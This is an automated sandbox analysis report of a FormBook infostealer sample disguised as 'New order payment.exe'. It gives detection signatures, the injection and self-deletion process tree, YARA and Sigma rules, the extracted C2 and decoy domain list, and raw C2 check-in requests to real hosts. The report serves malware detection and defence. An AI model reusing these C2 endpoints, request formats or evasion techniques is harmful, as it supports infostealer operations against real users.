Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report New order payment.exe

Overview

General Information

Sample Name:New order payment.exe
Analysis ID:510241
MD5:0c301355b11c3bc570d18b02bb7c99d8
SHA1:b35295390555e6fc0b85d538dafbfb4cf8c68564
SHA256:77abd0b0f20b0ca86c241acf5d5d60188362e75213f894b7bea82c8f75a3c1b1
Tags:exeformbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sigma detected: Suspect Svchost Activity
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
Injects a PE file into a foreign processes
Sigma detected: Suspicious Svchost Process
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • New order payment.exe (PID: 4912 cmdline: 'C:\Users\user\Desktop\New order payment.exe' MD5: 0C301355B11C3BC570D18B02BB7C99D8)
    • New order payment.exe (PID: 2372 cmdline: 'C:\Users\user\Desktop\New order payment.exe' MD5: 0C301355B11C3BC570D18B02BB7C99D8)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • svchost.exe (PID: 2600 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
          • cmd.exe (PID: 6196 cmdline: /c del 'C:\Users\user\Desktop\New order payment.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.crisisinterventionadvocates.com/u9xn/"], "decoy": ["lifeguardingcoursenearme.com", "bolsaspapelcdmx.com", "parsleypkllqu.xyz", "68134.online", "shopthatlookboutique.com", "canlibahisportal.com", "oligopoly.city", "srchwithus.online", "151motors.com", "17yue.info", "auntmarysnj.com", "hanansalman.com", "heyunshangcheng.info", "doorslamersplus.com", "sfcn-dng.com", "highvizpeople.com", "seoexpertinbangladesh.com", "christinegagnonjewellery.com", "artifactorie.biz", "mre3.net", "webbyteanalysis.online", "medicmir.store", "shdxh.com", "salvationshippingsecurity.com", "michita.xyz", "itskosi.com", "aligncoachingconsulting.com", "cryptorickclub.art", "cyliamartisbackup.com", "ttemola.com", "mujeresenfarmalatam.com", "mykombuchafactory.com", "irasutoya-ryou.com", "envtmyouliqy.mobi", "expert-rse.com", "oddanimalsink.com", "piezoelectricenergy.com", "itservices-india.com", "wintwiin.com", "umgaleloacademy.com", "everythangbutwhite.com", "ishhs.xyz", "brandsofcannabis.com", "sculptingstones.com", "hilldetailingllc.com", "stone-project.net", "rbrituelbeaute.com", "atzoom.store", "pronogtiki.store", "baybeg.com", "b148tlrfee9evtvorgm5947.com", "msjanej.com", "western-overseas.info", "sharpecommunications.com", "atlantahomesforcarguys.com", "neosudo.com", "blulacedefense.com", "profilecolombia.com", "blacksaltspain.com", "sejiw3.xyz", "saint444.com", "getoken.net", "joycegsy.com", "fezora.xyz"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x16af8:$sqlite3text: 68 38 2A 90 C5
    • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.299937698.00000000008B0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.299937698.00000000008B0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.New order payment.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.New order payment.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.New order payment.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15cc9:$sqlite3step: 68 34 1C 7B E1
        • 0x15ddc:$sqlite3step: 68 34 1C 7B E1
        • 0x15cf8:$sqlite3text: 68 38 2A 90 C5
        • 0x15e1d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
        1.0.New order payment.exe.400000.6.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.0.New order payment.exe.400000.6.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 28 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Suspect Svchost ActivityShow sources
          Source: Process startedAuthor: David Burkett: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3472, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 2600
          Sigma detected: Suspicious Svchost ProcessShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3472, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 2600
          Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3472, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 2600

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.crisisinterventionadvocates.com/u9xn/"], "decoy": ["lifeguardingcoursenearme.com", "bolsaspapelcdmx.com", "parsleypkllqu.xyz", "68134.online", "shopthatlookboutique.com", "canlibahisportal.com", "oligopoly.city", "srchwithus.online", "151motors.com", "17yue.info", "auntmarysnj.com", "hanansalman.com", "heyunshangcheng.info", "doorslamersplus.com", "sfcn-dng.com", "highvizpeople.com", "seoexpertinbangladesh.com", "christinegagnonjewellery.com", "artifactorie.biz", "mre3.net", "webbyteanalysis.online", "medicmir.store", "shdxh.com", "salvationshippingsecurity.com", "michita.xyz", "itskosi.com", "aligncoachingconsulting.com", "cryptorickclub.art", "cyliamartisbackup.com", "ttemola.com", "mujeresenfarmalatam.com", "mykombuchafactory.com", "irasutoya-ryou.com", "envtmyouliqy.mobi", "expert-rse.com", "oddanimalsink.com", "piezoelectricenergy.com", "itservices-india.com", "wintwiin.com", "umgaleloacademy.com", "everythangbutwhite.com", "ishhs.xyz", "brandsofcannabis.com", "sculptingstones.com", "hilldetailingllc.com", "stone-project.net", "rbrituelbeaute.com", "atzoom.store", "pronogtiki.store", "baybeg.com", "b148tlrfee9evtvorgm5947.com", "msjanej.com", "western-overseas.info", "sharpecommunications.com", "atlantahomesforcarguys.com", "neosudo.com", "blulacedefense.com", "profilecolombia.com", "blacksaltspain.com", "sejiw3.xyz", "saint444.com", "getoken.net", "joycegsy.com", "fezora.xyz"]}
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.2.New order payment.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.New order payment.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.New order payment.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New order payment.exe.f020000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.New order payment.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.New order payment.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.New order payment.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.New order payment.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New order payment.exe.f020000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.299937698.00000000008B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.276617394.000000000FA2C000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.247641891.000000000F020000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.243344701.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.299991453.0000000000910000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.501581822.0000000000C50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.502016177.0000000002C90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.289468709.000000000FA2C000.00000040.00020000.sdmp, type: MEMORY
          Antivirus detection for URL or domainShow sources
          Source: http://www.sejiw3.xyz/u9xn/?EvGDLnJ=Mi491nAN/W8j69kCQou8To2ktmeGxZt9RYONiJPW2rEgEezOpzjOfOleU2kzp5ym9Hqq&5j=0BKPgh7X4nAvira URL Cloud: Label: phishing
          Machine Learning detection for sampleShow sources
          Source: New order payment.exeJoe Sandbox ML: detected
          Source: 1.0.New order payment.exe.400000.3.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 1.0.New order payment.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 1.2.New order payment.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.New order payment.exe.400000.2.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 1.0.New order payment.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 14.2.svchost.exe.3015000.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.0.New order payment.exe.400000.1.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 1.1.New order payment.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.New order payment.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.New order payment.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 14.2.svchost.exe.3d3796c.4.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.2.New order payment.exe.f020000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: New order payment.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wntdll.pdbUGP source: New order payment.exe, 00000000.00000003.242757682.000000000F1F0000.00000004.00000001.sdmp, New order payment.exe, 00000001.00000003.244051355.0000000000630000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.503827179.000000000391F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: New order payment.exe, svchost.exe
          Source: Binary string: svchost.pdb source: New order payment.exe, 00000001.00000002.301223099.00000000026E0000.00000040.00020000.sdmp
          Source: Binary string: svchost.pdbUGP source: New order payment.exe, 00000001.00000002.301223099.00000000026E0000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_00405E93 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_00402671 FindFirstFileA,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop ebx

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49755 -> 51.210.240.92:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49755 -> 51.210.240.92:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49755 -> 51.210.240.92:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49791 -> 74.208.236.134:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49791 -> 74.208.236.134:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49791 -> 74.208.236.134:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49798 -> 35.241.55.103:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49798 -> 35.241.55.103:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49798 -> 35.241.55.103:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49800 -> 52.210.179.84:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49800 -> 52.210.179.84:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49800 -> 52.210.179.84:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.hanansalman.com
          Source: C:\Windows\explorer.exeDomain query: www.sejiw3.xyz
          Source: C:\Windows\explorer.exeDomain query: www.crisisinterventionadvocates.com
          Source: C:\Windows\explorer.exeNetwork Connect: 137.184.31.35 80
          Source: C:\Windows\explorer.exeNetwork Connect: 160.153.136.3 80
          Source: C:\Windows\explorer.exeDomain query: www.srchwithus.online
          Source: C:\Windows\explorer.exeDomain query: www.heyunshangcheng.info
          Source: C:\Windows\explorer.exeNetwork Connect: 51.210.240.92 80
          Source: C:\Windows\explorer.exeNetwork Connect: 74.208.236.134 80
          Source: C:\Windows\explorer.exeNetwork Connect: 3.67.234.155 80
          Source: C:\Windows\explorer.exeNetwork Connect: 35.241.55.103 80
          Source: C:\Windows\explorer.exeDomain query: www.christinegagnonjewellery.com
          Source: C:\Windows\explorer.exeDomain query: www.mykombuchafactory.com
          Source: C:\Windows\explorer.exeDomain query: www.itskosi.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.salvationshippingsecurity.com
          Source: C:\Windows\explorer.exeDomain query: www.sfcn-dng.com
          Source: C:\Windows\explorer.exeDomain query: www.umgaleloacademy.com
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.sejiw3.xyz
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.crisisinterventionadvocates.com/u9xn/
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: PANDGUS PANDGUS
          Source: Joe Sandbox ViewASN Name: GODADDY-AMSDE GODADDY-AMSDE
          Source: global trafficHTTP traffic detected: GET /u9xn/?EvGDLnJ=eYxsMd5wljUn1Fg6115NyaMNAPOWoN8Xbg1oh/XArMcWaLbikdCkMKkIXUVVkDc1SuQ5&5j=0BKPgh7X4n HTTP/1.1Host: www.salvationshippingsecurity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?EvGDLnJ=RrR08BH4oIo+gx361vOF46QRRg434M3aJQMobyGncW6ZpM1n/iVBy8ajhiKV3UdnqaZn&5j=0BKPgh7X4n HTTP/1.1Host: www.heyunshangcheng.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?EvGDLnJ=LAjf/xx2BjlKOSx2Nw0FybGnOLdFfrA16q3xOuIsu5dbrvvju1demR4HH9h71lmoA2bo&5j=0BKPgh7X4n HTTP/1.1Host: www.crisisinterventionadvocates.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?EvGDLnJ=Js+sgmRaIVUq7qFzsJAJ+9AXXLZC0X79cc7qqoZBkLaFxYs1smoq8VOLmQUttipLhfLz&5j=0BKPgh7X4n HTTP/1.1Host: www.srchwithus.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?EvGDLnJ=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&5j=0BKPgh7X4n HTTP/1.1Host: www.itskosi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?EvGDLnJ=Mi491nAN/W8j69kCQou8To2ktmeGxZt9RYONiJPW2rEgEezOpzjOfOleU2kzp5ym9Hqq&5j=0BKPgh7X4n HTTP/1.1Host: www.sejiw3.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?EvGDLnJ=FQ+FDzcRNFqTHDas5QzX/ZxEACq3iyWpSRLff56TNweY9Uo4XxUeKhcbnwpchSkctfqz&5j=0BKPgh7X4n HTTP/1.1Host: www.hanansalman.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 160.153.136.3 160.153.136.3
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 27 Oct 2021 14:20:27 GMTContent-Type: text/htmlContent-Length: 275ETag: "61704c6b-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Wed, 27 Oct 2021 14:20:38 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 